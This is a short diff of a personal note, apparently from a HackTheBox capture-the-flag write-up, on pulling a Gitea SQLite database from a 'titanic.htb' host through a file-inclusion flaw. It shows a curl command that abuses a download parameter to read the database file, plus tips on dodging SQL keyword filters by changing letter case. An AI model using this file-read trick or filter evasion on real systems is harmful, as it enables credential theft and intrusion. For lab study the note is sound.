sleeptoken/zettelkasten/Remote Thought/use SQLite on DB found via LFI.md

 curl -s "http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db" -o gitea.db
 ```

-> [!NOTE]
+> [!tip]
 > If in a CTF using UNION or SELECT is blocked then try using a different case for those words eg. Union Select.
-If a DB is vulnerable to SQLite injection you could use a known username eg.admin to drop table details using

 Open `gitea.db` in SQLite:
 ```